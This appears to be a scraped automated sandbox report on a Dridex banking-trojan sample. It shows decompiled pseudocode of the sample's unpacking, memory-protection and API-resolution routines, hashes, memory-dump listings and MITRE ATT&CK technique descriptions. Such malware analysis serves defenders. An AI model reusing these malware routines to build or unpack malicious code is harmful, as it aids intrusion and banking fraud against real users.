									E7099F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x709ad2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E7099F6F0( &(_t535[0x11c]));
							E709A8DD4(_t381,  &(_t535[0xd8]));
							E7099F6F0( &(_t535[0x1c]));
							E7099F6F0( &(_t535[0x44]));
							E7099F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E7099F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E7099F8C4( &(_t535[0x38]), E7099F568( &(_t535[0x34])) + 0x14);
							_t347 = E7099F558( &(_t535[0x38]), E7099F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E7099F558( &(_t535[0xc]), _t62);
						_t455 = E7099F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x709a14e4
0x709a14eb
0x709a14ee
0x709a14f5
0x709a1c77
0x709a1c77
0x709a14fb
0x709a1506
0x709a1a45
0x709a1a49
0x00000000
0x709a1cc8
0x709a1a4f
0x709a1a52
0x709a1a55
0x709a1a5f
0x709a1a6e
0x709a1a70
0x709a1a77
0x709a1c61
0x709a1c63
0x709a1c66
0x709a1c6a
0x00000000
0x709a1c6a
0x709a1a86
0x709a1a91
0x709a1a98
0x709a1a9b
0x709a1a9d
0x709a1aa0
0x709a1aa3
0x709a1aa9
0x709a1ab7
0x709a1ac7
0x709a1aec
0x709a1afd
0x709a1b00
0x709a1b02
0x709a1b66
0x709a1b69
0x709a1b69
0x709a1b6b
0x709a1b6e
0x709a1b72
0x709a1b72
0x709a1b76
0x00000000
0x00000000
0x709a1b83
0x709a1b89
0x709a1bbd
0x709a1bc3
0x709a1bc5
0x709a1c94
0x709a1c9c
0x709a1c9f
0x709a1ca1
0x709a1cb8
0x709a1cb8
0x709a1ca3
0x709a1ca7
0x709a1cac
0x709a1cac
0x709a1cba
0x709a1cc0
0x709a1bdf
0x709a1bdf
0x709a1be1
0x709a1be1
0x709a1be3
0x709a1be3
0x709a1be8
0x00000000
0x00000000
0x709a1bea
0x709a1beb
0x709a1bee
0x709a1bf1
0x00000000
0x00000000
0x709a1bfd
0x709a1c00
0x709a1c02
0x709a1c19
0x709a1c19
0x709a1c04
0x709a1c08
0x709a1c0d
0x709a1c0d
0x709a1c26
0x709a1c29
0x709a1c32
0x709a1c35
0x709a1c58
0x709a1c5c
0x00000000
0x709a1c5c
0x709a1c3d
0x709a1c3d
0x709a1c49
0x709a1c4c
0x709a1c55
0x00000000
0x709a1c55
0x709a1bcb
0x709a1bdb
0x709a1bdb
0x709a1bdd
0x00000000
0x00000000
0x709a1bd3
0x709a1bd5
0x709a1bd5
0x00000000
0x709a1bdb
0x709a1b8b
0x709a1b93
0x709a1bb3
0x709a1b95
0x709a1b95
0x709a1b9d
0x709a1ba6
0x709a1ba6
0x709a1b9d
0x00000000
0x709a1b93
0x709a1b04
0x709a1b0b
0x00000000
0x00000000
0x709a1b18
0x709a1b1e
0x709a1b23
0x709a1b2a
0x709a1b2e
0x709a1b43
0x709a1b45
0x709a1b47
0x709a1b4d
0x709a1b5b
0x709a1b5b
0x709a1b61
0x00000000
0x709a1b61
0x00000000
0x00000000
0x00000000
0x00000000
0x709a1aab
0x709a1aab
0x709a1aab
0x709a1aac
0x709a1aaf
0x709a1ab3
0x00000000
0x709a1ac9
0x709a1acc
0x709a1acf
0x709a1ad8
0x709a1adb
0x709a1adc
0x709a1ade
0x00000000
0x709a1519
0x709a151b
0x709a1520
0x709a152b
0x709a1539
0x709a154c
0x709a1559
0x709a1562
0x709a1566
0x709a156a
0x709a15b2
0x709a15b2
0x709a15b4
0x709a15bb
0x00000000
0x00000000
0x709a15d4
0x709a15dc
0x709a15e0
0x709a15f5
0x709a15f9
0x709a15fd
0x709a1606
0x709a160c
0x709a160f
0x709a1613
0x709a161b
0x709a161d
0x709a1621
0x709a1628
0x709a1631
0x709a1631
0x709a1635
0x709a164a
0x709a1660
0x709a166d
0x709a166e
0x709a166e
0x709a1670
0x00000000
0x00000000
0x00000000
0x00000000
0x709a162a
0x709a162a
0x709a162a
0x709a162b
0x709a162c
0x00000000
0x709a162a
0x709a15ef
0x709a15f3
0x00000000
0x00000000
0x00000000
0x709a1674
0x709a1674
0x709a1675
0x709a1678
0x709a1682
0x709a1682
0x709a1686
0x709a168d
0x709a16e8
0x709a16ed
0x709a1740
0x709a1740
0x709a1744
0x709a1748
0x709a1572
0x709a1575
0x709a157a
0x709a1580
0x709a1583
0x709a158a
0x709a158e
0x709a1595
0x709a159e
0x709a15a2
0x709a15a6
0x709a15ac
0x00000000
0x00000000
0x00000000
0x709a15ac
0x709a1752
0x709a175e
0x709a1769
0x709a1770
0x709a1779
0x709a1783
0x709a1784
0x709a1792
0x709a1797
0x709a1798
0x709a17a5
0x709a17aa
0x709a17bc
0x709a17c1
0x709a17c6
0x709a17d8
0x709a17ea
0x709a17ef
0x709a17fa
0x709a1801
0x709a1806
0x709a180e
0x709a1817
0x709a1817
0x709a1823
0x709a182a
0x709a1836
0x709a1842
0x709a1850
0x709a1861
0x709a1868
0x709a186d
0x709a1876
0x709a187b
0x709a187d
0x709a1881
0x709a1885
0x709a1892
0x709a189f
0x709a18a3
0x709a18b7
0x709a18bb
0x00000000
0x00000000
0x709a18d0
0x709a18d2
0x709a18da
0x709a18d7
0x709a18d7
0x709a18d7
0x709a18de
0x709a18e0
0x709a18e6
0x709a18ec
0x709a1948
0x709a1951
0x709a1955
0x709a1962
0x709a196b
0x709a1970
0x709a1974
0x709a1977
0x709a19d8
0x709a19ee
0x709a19f9
0x709a19fa
0x709a19fb
0x709a19ff
0x709a1a02
0x709a1c82
0x709a1c85
0x709a1c85
0x00000000
0x709a1a02
0x709a1981
0x709a1991
0x709a199a
0x709a19a3
0x709a19ac
0x709a19ad
0x709a19ae
0x709a19b3
0x709a19bb
0x709a19c3
0x00000000
0x00000000
0x00000000
0x709a19c5
0x709a18f5
0x709a18fa
0x709a18fe
0x709a18fe
0x709a1902
0x709a1905
0x00000000
0x00000000
0x709a1926
0x709a1928
0x709a192c
0x709a192e
0x00000000
0x00000000
0x709a1930
0x709a1937
0x709a1943
0x00000000
0x709a1943
0x709a190a
0x00000000
0x709a1a08
0x709a1a08
0x709a1a09
0x709a1a19
0x709a1a25
0x709a1a2e
0x709a1a37
0x709a1a40
0x00000000
0x709a1a40
0x709a16ef
0x709a16f1
0x709a16f3
0x709a16f8
0x709a16fd
0x709a1710
0x709a1726
0x709a172f
0x709a1730
0x709a1730
0x709a1732
0x709a1733
0x709a1736
0x709a173a
0x00000000
0x709a16f3
0x709a168f
0x709a1699
0x709a169a
0x709a169a
0x709a16a7
0x709a16b3
0x709a16b5
0x709a16b7
0x709a16bb
0x709a16cb
0x709a16cb
0x709a16d2
0x709a16d5
0x709a16d6
0x709a16da
0x709a16e4
0x00000000
0x709a16e4

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbec59e5c31d3b36f822dc7be48371256d9d9637046e5deb73d8aad74409e796
Instruction ID: 4c9c1f4d5da5cca8754508c7fea90670efd32cdf2182a884dcdfb87df7f2e6e5
Opcode Fuzzy Hash: cbec59e5c31d3b36f822dc7be48371256d9d9637046e5deb73d8aad74409e796
Instruction Fuzzy Hash: 933233B0508345DFC715DF28C891BAEB7F8AF95308F50892DE5968B2A0EB70E945CB53

Uniqueness

Uniqueness Score: -1.00%

Function 70996DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E70996DC8() {

				 *0x709ad280 = GetUserNameW;
				 *0x709AD284 = MessageBoxW;
				 *0x709AD288 = GetLastError;
				 *0x709AD28C = CreateFileA;
				 *0x709AD290 = DebugBreak;
				 *0x709AD294 = FlushFileBuffers;
				 *0x709AD298 = FreeEnvironmentStringsA;
				 *0x709AD29C = GetConsoleOutputCP;
				 *0x709AD2A0 = GetEnvironmentStrings;
				 *0x709AD2A4 = GetLocaleInfoA;
				 *0x709AD2A8 = GetStartupInfoA;
				 *0x709AD2AC = GetStringTypeA;
				 *0x709AD2B0 = HeapValidate;
				 *0x709AD2B4 = IsBadReadPtr;
				 *0x709AD2B8 = LCMapStringA;
				 *0x709AD2BC = LoadLibraryA;
				 *0x709AD2C0 = OutputDebugStringA;
				return 0x709ad280;
			}

0x70996dd9
0x70996de1
0x70996de4
0x70996df3
0x70996df6
0x70996e05
0x70996e08
0x70996e17
0x70996e1a
0x70996e29
0x70996e2c
0x70996e3b
0x70996e3e
0x70996e4d
0x70996e50
0x70996e5f
0x70996e62
0x70996e65

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ca86bc3cf42731b882398bb2b2a03e0f853d2a6caff4cccdce23bb5dec6fc1
Instruction ID: c5a11133b1cca3e572e055be402f2b2e9b9784c78c12b1fee88fbcb49dbf8e5c
Opcode Fuzzy Hash: 86ca86bc3cf42731b882398bb2b2a03e0f853d2a6caff4cccdce23bb5dec6fc1
Instruction Fuzzy Hash: 9E11E0F9A29620CF8398CF0AD590A517BF1BF8E31032281AAD9098B375D734D945EF94

Uniqueness

Uniqueness Score: -1.00%

Function 7099BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E7099BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E7099C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E709A2F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x7099bc01
0x7099bc03
0x7099bc0a
0x7099bc29
0x7099bc2a
0x7099bc0c
0x7099bc16
0x7099bc1d
0x7099bc23
0x00000000
0x7099bc1f
0x7099bc1f
0x7099bc21
0x7099bc22
0x7099bc22
0x7099bc1d

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: a6f82a7d671ad6ab76a421b0daf9a42be18a80372568b7863e311278300b4e88
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: EBD012B21101436ADF15173DFF0175DE7AD4FC1155F54085A654167059DFAAC451842A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4628 Parent PID: 7016 rundll32.exeCOMMON

Executed Functions

Function 007F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E007F2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x7f4418 = 1;
				asm("movaps xmm0, [0x7f3010]");
				asm("movups [0x7f4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E007F2569();
				E007F1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E007F2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x7f4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E007F2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x007f221f
0x007f222d
0x007f2234
0x007f2237
0x007f2241
0x007f2248
0x007f2252
0x007f2258
0x007f2261
0x007f226a
0x007f226d
0x007f2273
0x007f2277
0x007f227f
0x007f2283
0x007f2286
0x007f2289
0x007f228c
0x007f228f
0x007f22a9
0x007f22af
0x007f22b2
0x007f22ba
0x007f22be
0x007f22c1
0x007f22c4
0x007f22c7
0x007f22ca
0x007f22e6
0x007f2303
0x007f2328
0x007f232a
0x007f2333
0x007f2336
0x007f2340
0x007f2343
0x007f2346
0x007f2349
0x007f234c
0x007f23a4
0x007f23a4
0x007f254a
0x007f2550
0x007f244d
0x007f2453
0x007f249f
0x007f249f
0x007f24bc
0x007f24e2
0x007f24f0
0x007f24f3
0x007f24f7
0x007f24fb
0x007f2502
0x007f2508
0x007f250a
0x007f251c
0x007f2524
0x007f252a
0x007f2530
0x007f2536
0x00000000
0x00000000
0x007f253c
0x007f249f
0x007f245b
0x007f2469
0x007f2471
0x007f2474
0x007f2476
0x007f247c
0x007f2488
0x007f248e
0x007f2491
0x007f2494
0x007f238a
0x007f238a
0x007f23d8
0x007f23de
0x007f23e4
0x007f23ea
0x007f23f0
0x007f23f5
0x007f23fb
0x007f23fe
0x007f2401
0x007f2409
0x007f2411
0x007f2414
0x007f2417
0x007f241d
0x007f2423
0x007f242e
0x007f2362
0x007f2368
0x007f2368
0x007f23c5

APIs

VirtualProtect.KERNELBASE ref: 007F228F
VirtualProtect.KERNELBASE ref: 007F2328

Strings

t, xrefs: 007F2409

Memory Dump Source

Source File: 00000004.00000002.587861508.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 2ee2529d8aa9a322fc431def14806d7b0705101439a79b43680a94f20b2a0399
Instruction ID: 821d145b010c0cf629332302d562119b5f44992b4bd1aca35cb6ca5cdade05ce
Opcode Fuzzy Hash: 2ee2529d8aa9a322fc431def14806d7b0705101439a79b43680a94f20b2a0399
Instruction Fuzzy Hash: 6C818AB4E04208CFCB04DF99C584AADFBF1BF48310F65856AE958AB362D734A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 007F2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 007F2508

Memory Dump Source

Source File: 00000004.00000002.587861508.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6e0d0bb0e1c70463c5ef6c4fe6b6d527a2afddead4326c187f37a4b5024d4165
Instruction ID: 7f3d46346a5d56f2daafa1f092d4bcb93ce6f886d5b9ac88eeae9e4d79839ee0
Opcode Fuzzy Hash: 6e0d0bb0e1c70463c5ef6c4fe6b6d527a2afddead4326c187f37a4b5024d4165
Instruction Fuzzy Hash: B131C8B5D102288FDB14CF68C980AADB7F1BF88310F658699D94DA7346D735AE42CF81

Uniqueness

Uniqueness Score: -1.00%

Function 007F1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007F1EA8

Memory Dump Source

Source File: 00000004.00000002.587861508.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 9fe7b7d67231572369197301c279714738c35faea3c1e1111a65b473d7b87043
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: D341E2B1E05209CFDB04DFA8C4946AEBBF1BF48314F15852EE908AB340D739A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report BJKPKLUPiD

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 7016 Parent PID: 5972

Function 00972213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 709A07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 70991494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 709A218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 709A2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 709A3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 709A1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 709A5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 709A5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 709A5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 709A5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 709A5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

